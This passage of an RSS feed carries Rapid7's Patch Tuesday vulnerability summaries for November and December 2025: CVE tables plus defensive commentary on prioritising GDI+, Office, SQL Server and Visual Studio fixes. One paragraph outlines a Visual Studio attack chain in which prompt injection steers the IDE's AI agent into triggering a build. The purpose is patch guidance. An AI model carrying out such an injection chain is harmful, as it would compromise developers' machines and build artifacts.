ltr;"><span style='font-size: undefined;'>Windows File Explorer Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62570"><span style='font-size: undefined;'>CVE-2025-62570</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Camera Frame Server Monitor Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62469"><span style='font-size: undefined;'>CVE-2025-62469</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62569"><span style='font-size: undefined;'>CVE-2025-62569</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62573"><span style='font-size: undefined;'>CVE-2025-62573</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64670"><span style='font-size: undefined;'>CVE-2025-64670</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows DirectX Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62463"><span style='font-size: undefined;'>CVE-2025-62463</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62465"><span style='font-size: undefined;'>CVE-2025-62465</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62468"><span style='font-size: undefined;'>CVE-2025-62468</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Defender Firewall Service Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.4</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Windows ESU vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:12.364760432766616%"/><col style="width:42.65842349304482%"/><col style="width:13.75579598145286%"/><col style="width:16.228748068006183%"/><col style="width:14.99227202472952%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62549"><span style='font-size: undefined;'>CVE-2025-62549</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64678"><span style='font-size: undefined;'>CVE-2025-64678</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62472"><span style='font-size: undefined;'>CVE-2025-62472</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62474"><span style='font-size: undefined;'>CVE-2025-62474</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62571"><span style='font-size: undefined;'>CVE-2025-62571</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Installer Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62470"><span style='font-size: undefined;'>CVE-2025-62470</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Common Log File System Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62466"><span style='font-size: undefined;'>CVE-2025-62466</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Client-Side Caching Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62458"><span style='font-size: undefined;'>CVE-2025-62458</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Win32k Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54100"><span style='font-size: undefined;'>CVE-2025-54100</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PowerShell Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62455"><span style='font-size: undefined;'>CVE-2025-62455</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62473"><span style='font-size: undefined;'>CVE-2025-62473</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62567"><span style='font-size: undefined;'>CVE-2025-62567</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Hyper-V Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-december-2025</link>
      <guid isPermaLink="false">bltd85df63224f1b2bb</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Wed, 10 Dec 2025 07:50:42 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - November 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 66 new vulnerabilities today, which is far fewer than we’ve come to expect in recent months. There’s a lone exploited-in-the-wild zero-day vulnerability, which Microsoft assesses as critical severity, although there’s apparently no public disclosure yet. Three critical remote code execution (RCE) vulnerabilities are patched today; happily, Microsoft currently assesses all three as less likely to see exploitation. Five browser vulnerabilities and a dozen or so fixes for Azure Linux (aka Mariner) have already been published separately this month, and are not included in the total.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows GDI+: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Faced with a fresh stack of Patch Tuesday vulns, there are a few different ways to prioritize our analysis. Do we start with pre-authentication RCEs? The vuln with the highest CVSS base score? The vuln which is likely to affect just about every asset running Microsoft software? Any of these are sensible avenues of approach, and today, all roads lead to </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-60724"><span style='font-size: undefined;'>CVE-2025-60724</span></a><span style='font-size: undefined;'>. As the advisory notes, in the worst-case scenario, an attacker could exploit this vulnerability by uploading a malicious document to a vulnerable web service. The advisory doesn’t spell out the context of code execution, but if all the stars align for the attacker, the prize could be remote code execution as SYSTEM via the network without any need for an existing foothold. While this vuln almost certainly isn’t wormable, it’s clearly very serious and is surely a top priority for just about anyone considering how to approach this month’s patches.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The weakness underlying </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-60724"><span style='font-size: undefined;'>CVE-2025-60724</span></a><span style='font-size: undefined;'> is </span><a href="https://cwe.mitre.org/data/definitions/122.html"><span style='font-size: undefined;'>CWE-122: Heap-based buffer overflow</span></a><span style='font-size: undefined;'>, a concept which celebrated its 50th birthday several years ago. As the authors of the </span><a href="https://csrc.nist.gov/files/pubs/conference/1998/10/08/proceedings-of-the-21st-nissc-1998/final/docs/early-cs-papers/ande72a.pdf"><span style='font-size: undefined;'>original 1972 paper</span></a><span style='font-size: undefined;'> noted: “If the code makes use of an internal buffer, there is a possibility that a user could input enough data to overwrite other portions of the program's private storage.” Regarding computer security in general, they opined that “this problem is neither hopeless nor solved. It is, however, perfectly clear [...] that solutions to the problem will not occur spontaneously, nor will they come from the various well-intentioned attempts to provide security as an add-on to existing systems.”</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Office: critical ACE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Once again, we find ourselves wondering: “when is remote code execution really remote?” </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62199"><span style='font-size: undefined;'>CVE-2025-62199</span></a><span style='font-size: undefined;'> describes a critical RCE vulnerability in Microsoft Office, where exploitation relies on the user downloading and opening a malicious file. The attacker is remote, and that’s enough to satisfy the definition, even if the action is taken on the local system by the unwitting user. Anyone hoping that the Preview Pane is not a vector will be sadly disappointed, and this certainly increases the probability of real-world exploitation, since there’s no need for the attacker to craft a way around those pesky warnings about enabling dangerous content. Just scrolling through a list of emails in Outlook could be enough.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Visual Studio: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Some attacks are straightforward, with only a single step needed to reach the finish line. Others, like Visual Studio critical RCE </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62214"><span style='font-size: undefined;'>CVE-2025-62214</span></a><span style='font-size: undefined;'>, require that the attacker execute a complex chain of events. In this case, exploitation demands multi-stage abuse of recent advances in Visual Studio AI development capabilities, including prompt injection, Agent interaction, and triggering a build. The advisory doesn’t describe the context of code execution. If the prize is simply code execution on an asset in the context of the user, there’s no obvious advancement for the attacker, since exploitation already requires code execution on the asset by the attacker or the targeted user. The brief description of the attack chain does mention that the attacker would need to trigger a build. On that basis, possible outcomes might include execution in an elevated context, or compromised build artifacts, although the advisory does not provide enough information to be certain either way.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SQL Server: critical EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>SQL Server admins should take note of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59499"><span style='font-size: undefined;'>CVE-2025-59499</span></a><span style='font-size: undefined;'>, which describes an elevation of privilege (EoP) vulnerability. Although some level existing privileges are required, successful exploitation will permit an attacker to run arbitrary </span><a href="https://learn.microsoft.com/en-us/sql/t-sql/language-reference?view=sql-server-ver17"><span style='font-size: undefined;'>Transact-SQL</span></a><span style='font-size: undefined;'> (T-SQL) commands. T-SQL is the language which SQL Server databases and clients use to communicate with one another. Although the default configuration for SQL Server disables the xp_cmdshell functionality which allows direct callouts to the underlying OS, there’s more than one way to shine a penny, and the only safe assumption here is that exploitation will lead to code execution in the context of SQL Server itself. Patches are available for all supported versions of SQL Server.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Following the sweeping lifecycle changes seen in October 2025, Microsoft is taking it fairly easy this month. The only significant transition today is the end of support for Windows 11 Home and Pro 23H2. Unlike the demise of Windows 10, this much smaller change won’t affect most people; a small number of older CPUs might not make the cut, since Windows 11 24H2 introduces a requirement for a couple of newer CPU instruction sets. Microsoft provides lists of compatible </span><a href="https://learn.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-24h2-supported-intel-processors"><span style='font-size: undefined;'>Intel</span></a><span style='font-size: undefined;'>, </span><a href="https://learn.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-24h2-supported-amd-processors"><span style='font-size: undefined;'>AMD</span></a><span style='font-size: undefined;'>, and </span><a href="https://learn.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-24h2-supported-qualcomm-processors"><span style='font-size: undefined;'>Qualcomm</span></a><span style='font-size: undefined;'> CPU series.</span></p><h2>Summary charts</h2><h2></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9df58c4428f7ee1/6913a61cf60b0fbd1fbc2fa9/2025-11-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Nov" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Nov" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9df58c4428f7ee1/6913a61cf60b0fbd1fbc2fa9/2025-11-vuln_count_component.png" data-sys-asset-uid="bltc9df58c4428f7ee1" data-sys-asset-filename="2025-11-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Nov" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd27b88d5e8532fa2/6913a61d614c493236614d5a/2025-11-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Nov" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Nov" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd27b88d5e8532fa2/6913a61d614c493236614d5a/2025-11-vuln_count_impact.png" data-sys-asset-uid="bltd27b88d5e8532fa2" data-sys-asset-filename="2025-11-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Nov" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8492779a00a85bb/6913a61ca5e3f5290da763e4/2025-11-vuln_count_impact-component-heatmap.png" alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Nov" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Nov" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8492779a00a85bb/6913a61ca5e3f5290da763e4/2025-11-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltb8492779a00a85bb" data-sys-asset-filename="2025-11-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Nov" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2>Summary tables</h2><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59504">CVE-2025-59504</a></td><td><p>Azure Monitor Agent Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12729">CVE-2025-12729</a></td><td><p>Chromium: CVE-2025-12729 Inappropriate implementation in Omnibox</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12728">CVE-2025-12728</a></td><td><p>Chromium: CVE-2025-12728 Inappropriate implementation in Omnibox</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12727">CVE-2025-12727</a></td><td><p>Chromium: CVE-2025-12727 Inappropriate implementation in V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12726">CVE-2025-12726</a></td><td><p>Chromium: CVE-2025-12726 Inappropriate implementation in Views.</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12725">CVE-2025-12725</a></td><td><p>Chromium: CVE-2025-12725 Out of bounds write in WebGPU</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222">CVE-2025-62222</a></td><td><p>Agentic AI and Visual Studio Code Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62449">CVE-2025-62449</a></td><td><p>Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62214">CVE-2025-62214</a></td><td><p>Visual Studio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62453">CVE-2025-62453</a></td><td><p>GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5</p></td></tr></tbody></table><h3>Mariner Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-25621">CVE-2024-25621</a></td><td><p>containerd affected by a local privilege escalation via wide permissions on CRI directory</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10966">CVE-2025-10966</a></td><td><p>missing SFTP host verification with wolfSSH</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64329">CVE-2025-64329</a></td><td><p>containerd CRI server: Host memory exhaustion through Attach goroutine leak</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62210">CVE-2025-62210</a></td><td><p>Dynamics 365 Field Service (online) Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62211">CVE-2025-62211</a></td><td><p>Dynamics 365 Field Service (online) Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62206">CVE-2025-62206</a></td><td><p>Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62204">CVE-2025-62204</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62199">CVE-2025-62199</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62216">CVE-2025-62216</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62205">CVE-2025-62205</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60727">CVE-2025-60727</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62200">CVE-2025-62200</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62201">CVE-2025-62201</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62203">CVE-2025-62203</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60726">CVE-2025-60726</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62202">CVE-2025-62202</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60722">CVE-2025-60722</a></td><td><p>Microsoft OneDrive for Android Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59240">CVE-2025-59240</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60728">CVE-2025-60728</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a 